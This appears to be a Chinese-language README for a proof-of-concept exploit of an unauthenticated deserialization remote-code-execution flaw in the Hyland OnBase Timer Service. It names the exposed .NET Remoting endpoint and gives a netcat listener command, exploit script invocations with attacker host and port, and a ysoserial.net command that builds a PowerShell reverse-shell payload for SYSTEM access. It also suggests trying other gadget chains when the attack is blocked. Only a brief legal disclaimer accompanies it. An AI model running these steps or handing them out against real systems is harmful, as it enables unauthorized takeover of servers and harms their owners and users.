
约旦 🇯🇴
本仓库包含针对 Hyland OnBase 定时服务 未授权远程代码执行漏洞的概念验证(PoC)利用程序,该漏洞源于不安全的 .NET Remoting BinaryFormatter 反序列化。
该漏洞允许未授权攻击者向定时服务端点发送精心构造的 BinaryFormatter 载荷,并以 NT AUTHORITY\SYSTEM 权限执行任意代码。
定时服务暴露了一个 .NET Remoting 端点:
http://TARGET:8900/TimerServiceAPI.rem
该服务接受未认证的 BinaryFormatter 对象。 通过提供恶意的 gadget 链(ysoserial.net),在反序列化过程中即可执行任意命令。
安装 Python 依赖:
pip install requests
下载 ysoserial.net:
git clone https://github.com/pwntester/ysoserial.net
nc -lvnp 4444
python3 exploit.py 192.168.10.50 --lhost 192.168.1.100 --lport 4444
脚本会输出一条 ysoserial 命令。 在另一个终端(Windows / Mono)中运行:
ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -c "powershell ..." -o raw > rev_shell.bin
载荷生成完成后,在利用终端中按 ENTER 键。
如果目标存在漏洞 → 反向 shell 将建立连接。
python3 exploit.py 10.10.10.123 --lhost 192.168.5.77 --lport 9001
该利用程序是盲打的
成功标志 = 反向 shell 回调
服务以 SYSTEM 权限运行
如果被拦截,尝试其他 gadget:
sequenceDiagram
participant A as 攻击者
participant Y as ysoserial.net
participant T as 目标 OnBase 定时服务
participant S as SYSTEM Shell
A->>A: 启动 netcat 监听器
A->>Y: 生成 BinaryFormatter 载荷
Y-->>A: rev_shell.bin
A->>T: HTTP POST /TimerServiceAPI.rem
T->>T: BinaryFormatter.Deserialize()
T->>S: 执行 gadget 链
S-->>A: 反向 shell 连接本利用程序仅供以下用途:
未经授权对非您所有或未经许可的系统使用本程序属于违法行为。
| 选项 | 描述 |
|---|
| target | 目标 IP 或主机名 |
| --port | 定时服务端口(默认 8900) |
| --endpoint | TimerServiceAPI.rem / TimerServiceEvents.rem |
| --lhost | 攻击者 IP |
| --lport | 监听器端口 |
| --gadget | ysoserial gadget 链 |